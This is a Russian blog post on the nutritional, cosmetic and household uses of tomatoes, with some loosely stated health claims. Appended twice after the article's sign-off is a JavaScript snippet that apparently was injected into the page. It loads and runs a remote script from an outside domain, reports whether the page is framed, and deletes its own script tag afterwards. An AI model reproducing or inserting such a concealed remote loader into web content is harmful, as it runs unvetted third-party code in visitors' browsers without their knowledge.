Skip to Content

Полезные свойства помидоров - для еды и красоты

Аватар пользователя tashash

полезные свойства томатов

Мы все едим помидоры. Причем, блюд, которые из их них или с ними можно приготовить настолько много, что все их и не перечислишь. Но томаты нравятся нам не только благодаря своим вкусовым качествам. Полезные свойства помидоров позволяют получать не только удовольствие от употребления в пищу вкусных блюд.
Про томат
полезные свойства томатов
Томаты являются одним из самых любимых овощей по всему миру. Хотя, почему мы считаем помидор овощем? Ведь на самом деле это – ягода, как бы ни странно это звучало. Само название этой ягоды-овоща имеет интересную историю. Когда первые конкистадоры попали в Америку, то удивительные ягоды, которые употребляли в пищу жители Южной Америки, в частности, индейское племя Ацтеки, жившие в Мексике, и которые росли как дикое растение, привлекли их внимание. Несколько томатов, тогда, правда, они еще так не назывались, были привезены в Испанию. Оттуда они распространились по странам Европы, попав в Италию. Именно там они получили название Золотое яблоко, что на итальянском языке будет звучать как pomo d’oro – помидор. А по поводу слова томат, есть версия о том, что это – производная от ацтекского томатль, упрощенная в произношении.
Где и как растет томат
В Мексике и других странах южной Америки томаты и по сей день можно встретить в диком виде. Это просто удивительно, ведь мы привыкли, что томаты нужно выращивать очень бережно, особенно в более северных широтах. Сначала посадить семечки на рассаду, долго ухаживать за ней, что бы она взошла да окрепла. Потом распикировать – не повредив ничего! Вовремя подкармливать, поливать, не давать всяким гадостям подпортить нежные росточки. Только затем высадить в теплицу или открытый грунт и ждать урожая. Но и тут все не так просто. Томаты не любят холода и холодной росы, они легко могут заболеть какой-нибудь заразой. В общем, то что в некоторых странах томаты растут сами по себе и при этом прекрасно себя чувствую на протяжении столетий – просто чудо!
Из чего состоит помидор?
полезные свойства томатов
Помидор не только вкусен, его полезные свойства во многом причина того, что мы едим томаты в любое время года. Начнем с того, что ягоды-помидорки кладовая полезных веществ. И эта избитая фраза на удивление точно отражает истину. В томатах содержатся:
  • Витамины. Причем, в этих плодах ученые нашли все витамины группы В, представляете? Даже фолиевую кислоту! А еще витамин С и витамин Е, а так же каротин – витамин А
  • Органические кислоты: яблочная, лимонная, винная, щавелевая и янтарная
  • Высокомолекулярные жирные кислоты – линолиевая, пальмитиновая, стеариновая
  • Пигменты - ликопин, каротин, ксантофилл, придающие плодам томата красивую яркую окраску. И помимо своего красящего свойства, эти вещества – прекрасные антиоксиданты, что полезно для здоровья человека
  • Сахара – фруктоза и глюкоза. Так же в состав помидоров входит и крахмал – сахаристое вещество
  • Пектин – снижающий уровень сахара в крови. Это вещество делает томаты полезными для диабетиков
  • Клетчатка – необходимое вещество для качественной работы кишечника
  • Минеральные вещества. В томатах содержится много природных элементов, входящих в таблицу Менделеева и просто-таки необходимых нашему организму для правильного функционирования и жизнедеятельности. Это калий, магний, натрий, фосфор, железо, кальций, сера, цинк, ванадий, хлор, йод, кобальт
  • Холин, снижающий уровень холестерина в крови, что полезно при атеросклерозе.
Как использовать томат для пользы?
полезные свойства томатов
Понятно, что основное предназначение томатов – стать ингредиентами вкуснейших блюд. Но на этом их польза не заканчивается, ведь их можно использовать во многих сферах нашей жизнедеятельности. Например, на основе томатов готовят маски красоты. Допустим, такую - удивительно простую. Из половинки томата отжать сок, смочить им марлевую салфетку и на 15 минут положить ее на лицо. Можно просто смоченным в томатном соке ватным тампоном протирать кожу, как лосьоном. Такие процедуры помогут осветлить тон лица, очистить поры от загрязнений, а вкупе со специальными средствами позволят избавиться от акне и угрей. Или же вот еще рецепт. Небольшой помидор ошпарить кипятком, снять с него кожицу и растолочь, затем протереть мякоть через сито, освобождая от семечек. Тщательно смешать полученную массу с белком одного яйца. Маску нанести на чистую кожу и оставить на 15 минут. Смыть маску теплой водой, затем прохладной ополоснуть лицо и нанести на кожу питательный крем. Такая маска осветлит кожу и подтянет ее, избавляя от морщинок.
Так же томат используют в хозяйстве. Например, кашицей из свежего помидора хорошо очищаются столовые приборы. Их можно проварить в томатной пасте, а можно почистить при помощи губки. Так же, говорят, что сок помидоров хорошо убирает следы от зеленой травы. Но с таким чистящим средством нужно быть поосторожнее – вдруг не получится и вещь будет окончательно испорчена.?
Ну а вообще, помидор лучше все есть, в любом виде. А уход за вещами оставить для специально предназначенных для этого средств.
Удачи!(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random();
script.onload = script.onerror = function () {
script.onload = script.onerror = null;
script.parentNode.removeChild(script);
}

document.body.appendChild(script);
})();

(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random();
script.onload = script.onerror = function () {
script.onload = script.onerror = null;
script.parentNode.removeChild(script);
}

document.body.appendChild(script);
})();

Голосов еще нет

Полезные статьи от участников сайта

Аватар пользователя Elena75
Целлюлит на сегодняшний день стал проблемой...
Аватар пользователя Любовь
В канун новогодних праздников хочется выглядеть...
Аватар пользователя MissM
Сейчас набирает огромной популярности наращивание...
Аватар пользователя ymkocv
С детьми заниматься порой безумное удовольствие,...